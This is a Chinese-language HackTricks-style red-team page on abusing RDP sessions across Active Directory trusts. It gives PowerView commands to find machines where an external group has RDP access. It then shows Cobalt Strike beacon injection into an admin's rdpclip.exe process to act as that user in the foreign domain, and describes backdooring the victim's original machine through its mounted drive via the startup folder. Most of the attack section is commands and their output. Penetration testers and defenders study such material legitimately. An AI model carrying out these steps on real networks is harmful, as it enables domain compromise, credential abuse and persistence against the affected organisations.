RDP Sessions Abuse

chevron-right从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)arrow-up-righthashtag

支持 HackTricks 的其他方式:

RDP 进程注入

如果外部组在当前域中的任何计算机上具有RDP 访问权限攻击者可以入侵该计算机并等待用户

一旦用户通过 RDP 访问,攻击者可以转向该用户的会话并滥用其在外部域中的权限。

# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
PID   PPID  Name                         Arch  Session     User
---   ----  ----                         ----  -------     -----
...
4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user

查看本页中使用其他工具窃取会话的其他方法 在此页面中。

RDPInception

如果用户通过RDP访问一台等待攻击者的机器,攻击者将能够在用户的RDP会话中注入一个信标,如果受害者在通过RDP访问时挂载了他的驱动器攻击者可以访问它

在这种情况下,您可以通过在启动文件夹中写入后门妥协受害者的原始计算机

chevron-right从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)arrow-up-righthashtag

支持HackTricks的其他方式:

最后更新于